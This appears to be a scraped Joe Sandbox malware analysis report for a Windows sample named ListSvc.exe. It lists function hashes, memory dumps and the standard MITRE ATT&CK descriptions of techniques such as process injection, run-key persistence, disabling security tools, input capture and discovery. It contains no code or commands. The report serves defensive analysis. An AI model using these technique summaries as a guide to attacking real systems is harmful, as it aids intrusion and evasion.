Instruction Fuzzy Hash: F4D0973120E980CFD3023331ACAF784BAA8CF12710B0C94ABF44CC1A40E906C040EA86

Uniqueness

Uniqueness Score: -1.00%

Function 05221DD8, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f53298a7f6c7bac364faecd9511381606a909a988f0dbfedf58fb2b00baecb9
Instruction ID: 4867ed5008106590091376cc38328d15c95559d0dc86994f1568d4a46b8a128e
Opcode Fuzzy Hash: 9f53298a7f6c7bac364faecd9511381606a909a988f0dbfedf58fb2b00baecb9
Instruction Fuzzy Hash: 88D0A93C10A802ABC2148620C661B8AFF20EF4A200F08C42CD8AC42B01CB22D813AA41

Uniqueness

Uniqueness Score: -1.00%

Function 05228E40, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dfdd98a4dd51d0ac712a71cb75f7c530053693e57d1903db82f37e06db44287
Instruction ID: 403d65c5f8ee0aed352348aceefb18c1433512ebec837f989d3527d5b5ab9a65
Opcode Fuzzy Hash: 1dfdd98a4dd51d0ac712a71cb75f7c530053693e57d1903db82f37e06db44287
Instruction Fuzzy Hash: 84D0C9365402048FCB00ABBCD68EA043BF4EF59616F095994E5098B376D739F8349A41

Uniqueness

Uniqueness Score: -1.00%

Function 05228E50, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b1895cdde8c69e84c5035e0b4a2823540f2f1bbcb440c656c9e6ca4191ca510
Instruction ID: 04c9e2b8c09164d44dc3b84fe8d8f6b9bc46329b30c11074872e0cd9bd525416
Opcode Fuzzy Hash: 0b1895cdde8c69e84c5035e0b4a2823540f2f1bbcb440c656c9e6ca4191ca510
Instruction Fuzzy Hash: 25C04C352502048FC7409BB8E54D85877E8EB886153114094F50987362DA35EC008A40

Uniqueness

Uniqueness Score: -1.00%

Function 05223FD8, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.450206172.0000000005220000.00000040.00000001.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5220000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1667c62257872c0f96ca8d8901d2a29546e3505c7a3376742b6f3c74178979be
Instruction ID: dbad73eacc0a082ce2e70c87c97badbe7b7eb941dec993695c8e8fd5b7ff0c0a
Opcode Fuzzy Hash: 1667c62257872c0f96ca8d8901d2a29546e3505c7a3376742b6f3c74178979be
Instruction Fuzzy Hash: 14B01230206308CFC7043771681D05937DC9F44205340047CE10E86600EE36D410C684

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report ListSvc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre